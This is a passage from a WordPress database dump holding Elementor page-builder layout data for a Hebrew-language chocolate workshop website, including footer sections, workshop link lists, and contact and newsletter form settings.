\\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"34056794\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"79ba6502\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c9740a4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"62d9ea7a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"2a4010bc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"527df496\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%9E%D7%A1%D7%99%D7%91%D7%AA-%D7%A8%D7%95%D7%95%D7%A7%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"8c21433\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"227b633f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"73e3f56a\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4a1d5ee3\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"28ab3e99\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"7b6d813b\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"702cf53c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"718f913c\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(780,163,'_elementor_version','0.4'),(781,163,'_elementor_conditions','a:1:{i:0;s:21:\"include/singular/post\";}'),(782,164,'_elementor_template_type','single'),(783,164,'_elementor_edit_mode','builder'),(784,164,'_wp_page_template','default'),(785,164,'_elementor_page_settings','a:1:{s:13:\"page_template\";s:16:\"elementor_canvas\";}');
INSERT INTO `xrx_postmeta` VALUES (786,164,'_elementor_data','[{\"id\":\"5143e12f\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"71c4466d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"5c8ffdc1\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"48141d39\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"50bf4905\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"d5a34b\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7c736ec\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"081917e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d8afb22\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"60b32fa\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"f297d92\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"1154d95\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"\\u05db\\u05ea\\u05d5\\u05d1 \\u05d0\\u05ea \\u05d4\\u05db\\u05d5\\u05ea\\u05e8\\u05ea \\u05db\\u05d0\\u05df\"},\"elements\":[],\"widgetType\":\"theme-post-title\"}],\"isInner\":false},{\"id\":\"97fc875\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9efbb93\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"31e0ebc\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"\\u05d8\\u05d5\\u05e4\\u05e1 \\u05e6\\u05d3\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"_id\":\"message\",\"field_type\":\"textarea\",\"field_label\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4\",\"placeholder\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"message\"}],\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"34056794\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"79ba6502\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c9740a4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"62d9ea7a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"2a4010bc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"527df496\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%9E%D7%A1%D7%99%D7%91%D7%AA-%D7%A8%D7%95%D7%95%D7%A7%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"8c21433\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 